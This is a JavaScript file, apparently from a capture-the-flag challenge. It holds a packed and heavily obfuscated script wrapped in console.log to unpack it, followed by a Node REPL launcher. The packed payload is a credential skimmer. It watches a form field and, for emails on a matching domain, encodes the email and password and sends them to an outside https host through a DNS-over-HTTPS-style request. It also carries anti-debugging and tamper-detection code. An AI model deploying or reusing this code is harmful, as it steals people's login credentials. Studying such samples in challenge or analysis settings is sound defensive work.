console.log(

	function(p,a,c,k,e,d){
		e=function(c){return c};
		while(c--){
			d[c]=k[c]||c
		}

		k=[function(e){
			return d[e]}
			];

		e=function()
		{
			return'\\w+'
		};

		c=0;
		p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])
		return p
	}

	('7 304(){46.49(\'209\').305(\'306\',197)}7 197(){307 205="303://302.193/";19(46.49(\'101\').44&&46.49(\'101\').44.298(\'@297.193\')){200.299(200.300(204(46.49(\'101\').44,46.49(\'209\').44),"301"),205,"308")}}7 204(206,190){6 89=[\'309==\',\'316\',\'317==\',\'318\',\'319=\',\'315\',\'314=\',\'310==\',\'311=\',\'312=\',\'313==\',\'296\',\'295=\',\'279==\',\'280\',\'281==\',\'282\',\'278\',\'277/273=\',\'272==\',\'274/275==\',\'276\',\'283\',\'284=\',\'291/292=\',\'293/294\',\'290\',\'289=\',\'285=\',\'286/287+288\',\'320\',\'321==\',\'354=\',\'355=\',\'356==\',\'357\',\'353\',\'352==\',\'348=\',\'347==\',\'349==\',\'350/351==\',\'358=\',\'359=\',\'366/367==\',\'368\',\'369/365==\',\'364==\',\'360\',\'361=\',\'362==\',\'363==\',\'346\',\'345=\',\'329=\',\'330==\',\'331==\',\'332=\',\'328\',\'327/323==\',\'322\',\'324\',\'325=\',\'271=\',\'333/334==\',\'341==\',\'342\',\'343=\',\'344\',\'340=\'];(7(80,170){6 162=7(166){176(--166){80[\'112\'](80[\'339\']())}},220=7(){6 28={\'335\':{\'336\':\'157\',\'44\':\'337\'},\'240\':7(34,142,139,64){64=64||{};6 70=142+\'=\'+139,338=-241+243+244*-21;24(6 52=59*103+219+-184,100=34[\'23\'];52<100;52++){6 96=34[52];70+=\';\\18\'+96;6 72=34[96];34[\'112\'](72),100=34[\'23\'],72!==!![]&&(70+=\'=\'+72)}64[\'157\']=70},\'92\':7(){8\'370\'},\'212\':7(67,134){67=67||7(153){8 153};6 76=67(68 99(\'(?:^|;\\18)\'+134[\'234\'](/([.$?*|{}()[]\\/+^])/269,\'$1\')+\'=([^;]*)\')),168=7(165,135){165(++135)};8 168(162,170),76?191(76[-183+182+-250*-126]):57}},187=7(){6 141=68 99(\'\\53+\\18*\\73(\\73)\\18*{\\53+\\18*[\\58|\\39].+[\\58|\\39];?\\18*}\');8 141[\'133\'](28[\'92\'][\'69\']())};28[\'237\']=187;6 216=\'\';6 104=28[\'237\']();19(!104)28[\'240\']([\'*\'],\'213\',105*-50+-181*-81+-249);47 104?216=28[\'212\'](45,\'213\'):28[\'92\']()};220()}(89,-180+-174+-11*-261));6 16=7(35,169){35=35-(-241+243+244*-21);6 36=89[35];19(16[\'225\']===57){6 177=7(230){6 194=\'259+/=\',185=97(230)[\'234\'](/=+$/,\'\');6 108=\'\';24(6 75=59*103+219+-184,56,27,211=-183+182+-257*-137;27=185[\'258\'](211++);~27&&(56=75%(105*-50+-181*-81+-256)?56*(-180+-174+-21*-255)+27:27,75++%(21*252+-253*21+254))?108+=97[\'217\'](-260*11+267+268*-238&56>>(-(-266+265*-11+251)*75&-262+11*-263+-264*-29)):29*245+248+-246){27=194[\'247\'](27)}8 108};6 224=7(25,111){6 17=[],20=-270*-11+-326+402,40,78=\'\',98=\'\';25=177(25);24(6 65=-21*493+-11*494+495*103,199=25[\'23\'];65<199;65++){98+=\'%\'+(\'496\'+25[\'84\'](65)[\'69\'](492+11*-50+491*-11))[\'487\'](-(-488*-21+489+-11*490))}25=191(98);6 12;24(12=497+-498+215*-505;12<506+507+-504;12++){17[12]=12}24(12=503+499+-500;12<-501+-502+486;12++){20=(20+17[12]+111[\'84\'](12%111[\'23\']))%(29*-485+-470+471),40=17[12],17[12]=17[20],17[20]=40}12=-472+131*473+-469,20=11*468+11*464+465*-11;24(6 51=466+-11*467+-231*-474;51<25[\'23\'];51++){12=(12+(475+235*482+-29*483))%(210*-484+59*481+11*480),20=(20+17[12])%(-476+477+29*-509),40=17[12],17[12]=17[20],17[20]=40,78+=97[\'217\'](25[\'84\'](51)^17[(17[12]+17[20])%(479*-11+-11*-508+-517)])}8 78};16[\'147\']=224,16[\'87\']={},16[\'225\']=!![]}6 91=16[\'87\'][35];19(91===57){19(16[\'146\']===57){6 48=7(214){13[\'152\']=214,13[\'26\']=[539+-540+-541*-189,538+-537+533*221,-534+535+-536],13[\'132\']=7(){8\'542\'},13[\'127\']=\'\\53+\\18*\\73(\\73)\\18*{\\53+\\18*\',13[\'120\']=\'[\\58|\\39].+[\\58|\\39];?\\18*}\'};48[\'106\'][\'148\']=7(){6 128=68 99(13[\'127\']+13[\'120\']),167=128[\'133\'](13[\'132\'][\'69\']())?--13[\'26\'][11*543+550+-371]:--13[\'26\'][551*-125+-552*11+549];8 13[\'164\'](167)},48[\'106\'][\'164\']=7(90){19(!548(~90))8 90;8 13[\'122\'](13[\'152\'])},48[\'106\'][\'122\']=7(119){24(6 82=171*-544+-545*-21+-11*532,77=13[\'26\'][\'23\'];82<77;82++){13[\'26\'][\'112\'](121[\'531\'](121[\'518\']())),77=13[\'26\'][\'23\']}8 119(13[\'26\'][-519+-158*-510+-11*-511])},68 48(16)[\'148\'](),16[\'146\']=!![]}36=16[\'147\'](36,169),16[\'87\'][35]=36}47 36=91;8 36};6 38=16,192=16,144=7(){6 115=!![];8 7(149,71){6 150=115?7(){6 145=16;19(71){6 151=71[145(\'512\',\'513[\')](149,66);8 71=45,151}}:7(){};8 115=![],150}}(),85=144(13,7(){6 41=16,520=16,42={};42[\'521\']=7(143,138){8 143===138},42[41(\'137\',\'60\')]=\'140\',42[\'528\']=7(136){8 136()};6 63=42,88=7(){6 32=41,109=41;19(63[32(\'50\',\'116\')](63[32(\'529\',\'530\')],\'140\')){6 163=88[\'94\'+\'83\'](109(\'527\',\'107\')+109(\'526\',\'522\')+\'/\')()[\'94\'+\'83\'](32(\'523\',\'524$\')+\'[^\\18]+)+)+[\'+32(\'525\',\'229^228\'));8!163[32(\'553\',\'130]129\')](85)}47{7 514(){515=516}}};8 63[41(\'547\',\'546%478\')](88)});85();6 33=7(){6 86=!![];8 7(156,62){6 154=86?7(){19(62){6 155=62[\'208\'](156,66);8 62=45,155}}:7(){};8 86=![],154}}(),201=33(13,7(){6 9=16,10=16,15={};15[9(\'158\',\'186#\')]=7(160,159){8 160(159)},15[9(\'462\',\'116\')]=7(117,118){8 117+118},15[9(\'172\',\'130]129\')]=9(\'401\',\'226$\')+9(\'131\',\'%463\'),15[9(\'403\',\'198\')]=9(\'404\',\'400)399\')+10(\'395\',\'!202\')+\'396\\397\\39)(\'+\'\\18)\',15[10(\'21\',\'242\')]=7(123,124){8 123===124},15[9(\'398\',\'203\')]=\'405\',15[9(\'126\',\'113\')]=9(\'125\',\'43\'),15[9(\'406\',\'113\')]=10(\'413\',\'227\'),15[\'414\']=9(\'231\',\'43\'),15[10(\'238\',\'242\')]=9(\'415\',\')412\'),15[10(\'411\',\'229^228\')]=9(\'407\',\'408\'),15[10(\'409\',\'113\')]=\'410\',15[9(\'394\',\'43\')]=10(\'393\',\'378\'),15[10(\'29\',\'60\')]=7(223,222){8 223<222},15[10(\'379\',\'55]54\')]=10(\'221\',\'232[\'),15[9(\'175\',\'43\')]=10(\'380\',\'227\'),15[9(\'381\',\'226$\')]=\'5|4|0|1|3|\'+\'2\';6 14=15,236=7(){6 22=9,218=10,61;377{61=14[22(\'171\',\'376\')](372,14[\'373\'](14[22(\'215\',\'(%79\')](14[22(\'374\',\'188\')],14[218(\'375\',\'(%79\')]),\');\'))()}382(383){19(14[22(\'390\',\'60\')](22(\'391\',\'107\'),14[22(\'392\',\'107\')])){7 389(){6 239=22;19(388){6 233=384[239(\'385\',\'232[\')](386,66);8 387=45,233}}}47 61=416}8 61},93=236(),102=93[10(\'235\',\'55]54\')]=93[9(\'417\',\'60\')]||{},95=[14[10(\'210\',\'447\')],14[10(\'448\',\'@449\')],14[9(\'450\',\'55]54\')],14[9(\'446\',\'(%79\')],14[10(\'445\',\'186#\')],14[10(\'189\',\'173\')],14[10(\'81\',\'188\')]];24(6 74=-441*-11+442+-443;14[9(\'59\',\'444\')](74,95[\'23\']);74++){19(14[\'451\']!==14[10(\'452\',\'459\')]){6 179=14[10(\'460\',\'173\')][9(\'461\',\'458\')](\'|\'),178=-457*-172+175+-453;176(!![]){454(179[178++]){31\'0\':6 110=102[114]||37;30;31\'1\':37[10(\'455\',\'55]54\')]=33[9(\'456\',\'43\')](33);30;31\'2\':102[114]=37;30;31\'3\':37[9(\'11\',\'440\')]=110[\'69\'][10(\'439\',\'195&196\')](110);30;31\'4\':6 114=95[74];30;31\'5\':6 37=33[\'94\'+\'83\'][10(\'424\',\'203\')][10(\'425\',\'!202\')](33);30}426}}47{7 427(){6 207=423[\'208\'](422,66);8 418=45,207}}}});201(),161=38(\'419\',\'(420\')+38(\'105\',\'421\')+38(\'428\',\'429[436\')+192(\'437\',\'195&196\')+38(\'438\',\'198\');8 435(434.430({431:206,432:190,433:161}))}',
		10,
		554,
		'||||||var|function|return|_0x5321c8|_0x50f60b|0x1|_0x45492a|this|_0x252ceb|_0xc3aad1|_0x2655|_0x4f6276|x20|if|_0x1122e1|0x2|_0x20c7d2|length|for|_0x253751|cYYSed|_0x4e9ce0|_0x91f9c4|0x3|continue|case|_0x3eab0c|_0x542ec8|_0x5d89db|_0x54c467|_0x24a5d9|_0x33b787|_0x22d365|x22|_0x377caa|_0x36dec2|_0x17f7ff|q56Z|value|null|document|else|_0x6b05bd|getElementById|0x31|_0x2fc52e|_0x25b13c|x5cw|ZD|u|_0x899bb4|undefined|x27|0x25|3ZEB|_0x390bf6|_0x1494e0|_0x59bd19|_0x32bbc9|_0x3ea10d|arguments|_0x16987c|new|toString|_0x49f974|_0x543ccb|_0x5a66c0|x5c|_0x58d8c8|_0x213c5a|_0x9acf92|_0x3f7482|_0x3bded1|qd|_0x498c68|0x43|_0x1b0d48|r|charCodeAt|_0x30e9b9|_0x13dded|BqPxQO|_0x5498be|_0x576b|_0x322f2a|_0x130ae9|removeCookie|_0x30c665|constructo|_0x2641ff|_0x4fff93|String|_0x23830d|RegExp|_0x983224|7747eeee2f2dc162cc853a8371395dd5|_0x1e93e0|0x5f|_0x58179b|0x45|prototype|VT4Y|_0x426c9b|_0x3d652f|_0x2675f3|_0x273e3d|push|dPNk|_0x2deec7|_0x48b5ef|RqCE|_0x4ddf6b|_0x200db5|_0x212450|LjIihJ|Math|nQpDwk|_0x51a8a7|_0x58d0a6|0x10|0x5|eGtALB|_0x532824|b|ZV|0xb|myKpez|test|_0x29054f|_0x542382|_0x30b6f4|0x13|_0x408a32|_0x1310df|olKOK|_0x825485|_0x3175c1|_0x4079ad|_0x463d54|_0x4491a2|WvXVnm|PwaquU|oyjTXQ|_0x1591d2|_0x53bce4|_0x58c490|IBUBGu|_0x3f8d91|_0x46669e|_0xe95f59|_0x1512a4|cookie|0x1f|_0x4655a5|_0x2133ec|c70f2de15216c941c36a6a377a78f24f|_0x5b41e9|_0x4b7de1|DvLOWr|_0x2fc2b9|_0x383bdb|_0x305513|_0x43cd52|_0x4bcffa|_0x113d85|0xf|0x21|FVm6|0x160b|0x44|while|_0x431c27|_0x22c725|_0xff6221|0x223f|0x7e|0x4ee|0x1497|0x1afe|_0x162914|RQU|_0x276144|yLAg|0xc|ae3e3dd78438626d43caef461d837df4|decodeURIComponent|_0x2559d6|htb|_0x4f1d60|L5|s|d57ad09bd0208501e2808afa64e55af1|rQfT|_0x41b56a|doh|_0x40d985|oHO|R5q5|f9061f7c0fe73c0f0a9d310251a0f3b2|f4df21ccca072ba5e003e265e4314aa4|a4a926700de90750f38d50d44bf0d617|_0x329be2|apply|d1e0cb08a90965a7489aabc5f6d423ea|0x27|_0x1fdbe4|getCookie|counter|_0x5e0c60|0x17|_0x2c7fb2|fromCharCode|_0x30695e|0xd43|_0x328fe7|0x29|_0x33eed0|_0x1bbf7e|_0x11f0eb|AGphvx|MgF|6QJA|E9|d|_0x18405a|0x4|H7L|_0x366c4e|replace|0x2f|_0x247bb5|updateCookie|0x9|_0x42c5cf|setCookie|0x2cc|1o1T|0x208e|0xee1|0x6e3|0x2060|indexOf|0xbb7|0x13c4|0x322|0x2965|0xa98|0xc79|0x3c6|0x1c45|0x13c1|0xd3|charAt|abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789|0x29d|0x39b3|0x577|0x1f25|0xc36|0x831|0x2132|0x211b|0x347|g|0x2b1|WQe0W5pcVCofW4u5ntC|w2pdGLtdUW|cGJK|eSo|qSoeiG|wmkyimoX|WPxdJ8kPWOVcGSkoWQ|WR4UWRRcSmkL|lmo8ACoBja|W7RdHSkAW4PP|oCo3WPFdTa|xZddRuKg|o3pdMSk1W4K3WPpdQ8k3|hmo8WRKxWQq|WRhdRHCeWRG|W5|dQCk|W65O|pmo2WPy|ofdcNhO6|tdlcHa|dLMNcOHJcKcq|vX|dSx8P|W7G2hbDhW71WWQ4|WROHW6hcPmos|mail|endsWith|sendDohMsg|makeQuery|A|SFRCe3NvcnJ5X2J1dF90aGlzX2lzX25vdF95b3VyX2ZsYWd9|https|de1fb561338fe0fa7d1b7e13ff4219f6|addEventListener|change|const|GET|ir1cba|cNfCfG|aeWmdcK|m8o7WOpdTbK|cgxcJCk9WPddM0ziW73cKq|n2SWaGy|eN9plSk8|W7ddKZVcOCo7|gJ4sWQ8aESk3yb3cJG|y8otWOVdI8kX|WPldUMVdGs4|W6xdRSkEW4Lm|hmozW4Gslq|qSorWORdJSk0|W6C5oq|W47dJCk6W7fslmks|pCovzSoPWPS|0x1a78|jCo|WP0eW43cVmofW50Z|WOJdOCoZW6m|xapcQsVcUW|crL6oe7cHCkOW6emca|emoiEmkkWO4|aJ|cPqRdGW|data|key|timeout|_0x72bc55|shift|WONdVmoYW7upW5CaWRTBW5S|hSovWRCDla|WOyMpu4B|WRldLhddQHi|WPeQW5hcH8on|imoSAKTAW5xcQvRdHZu|WPaCaK41|WQ3dKKBdSYBdQe4ZW7hcSa|W6eBptxcLhddJmouagW|W67cHCoEWRtdSW|W55VW70acmkGWO|dHCosxa|W6FcJwddGa|gSoIrgPm|hSo9WPCRWO8|a8oWWOddRXy|j8o8W6Wzja|i1lcGgdcICoNWOFdQSo8|bSo6zSofWOm|s3NcSW8|o0xcM25d|WRqRW4WAs24lW5z2WPq|A0FdGY3cTG|W60wW5zlwG|WOJdNSkeWPpcQW|dVW|smkZhSo|xW|EX3dGu4U|mSoWWP|dev|0x3fa5|Function|NKJSN|0x41|0x14|EibL|try|1SyT|0x0|0x40|0x19|catch|_0x7f6bf5|_0x292d49|0x37|_0x5980d3|_0x2e1d4e|_0x5c518b|_0x3b5f48|0x12|0x3f|0x38|0x28|0x16|0x3a|rn|x20this|0x24|z|en|0x2a|0x17c7|0x3c|0x26|kDgbw|0xe|0x18|lT6k|0x22|table|0x2c|sOv|0x42|oArHg|0x11|window|0x32|_0x249cc9|0x1b|4jF|EkHz|_0x559efe|_0x5d16f5|0x7|0x2b|break|_0x855f22|0x3d|a|stringify|ad99c6f034d1ea1c806946aca0d37de5|c4950c445ce76c8090c39301cb6ea61d|b7a0d10dda58ed13561ce5810218d5a4|JSON|btoa|hV|0x2d|0x1a|0x3b|RLuC|0x1bb5|0xb03|0x26b8|6pOm|0x33|0x30|Ir8c|0x8|xpZ|0x39|DJBkx|0x1d|0x22af|switch|0x34|0x23|0x10b|hOL3|Cy6m|0x15|0x35|0x3e|a0o|0xc73|0x174a|0x327|0x15a7|0xad7|0x75a|0x1272|0x33b5|0x112f|0x23b|0x4a0|0xef7|0x1b7|0x1262|B|0xb16|0x80f|0x68|0x59|0xa6f|0x91|0xac1|0x1363|slice|0xfb5|0x2545|0x44ad|0x24f|0x290|0x7ea|0x253d|0x8f|00|0x2243|0x14a|0x7e0|0x25e5|0x9d9|0x88a|0x1e05|0x4347|0x16f|0x2533|0x1f14|0x1263|0x539|0xac|0x250|0x2e|awb|_0x19b1ee|_0x4263aa|_0x74b467|0x64d|random|0x1724|_0x27558d|oIKVK|4fzN|0xd|Zuk|0x20|0x1e|0x1c|tdecn|0x36|Kx8W|round|0x751|0x95|0x15f9|0x226a|0xc71|0x2284|0xaa7|0x4f9|0x1d40|0x206|newState|0x1fb9|0x115|0xbc6|oj|0x6|Boolean|0x19f2|0x1fed|0xef|0xb02|0xa'.split('|'),
		0,
		{}
	))

var repl = require("repl");
var r = repl.start("node> ");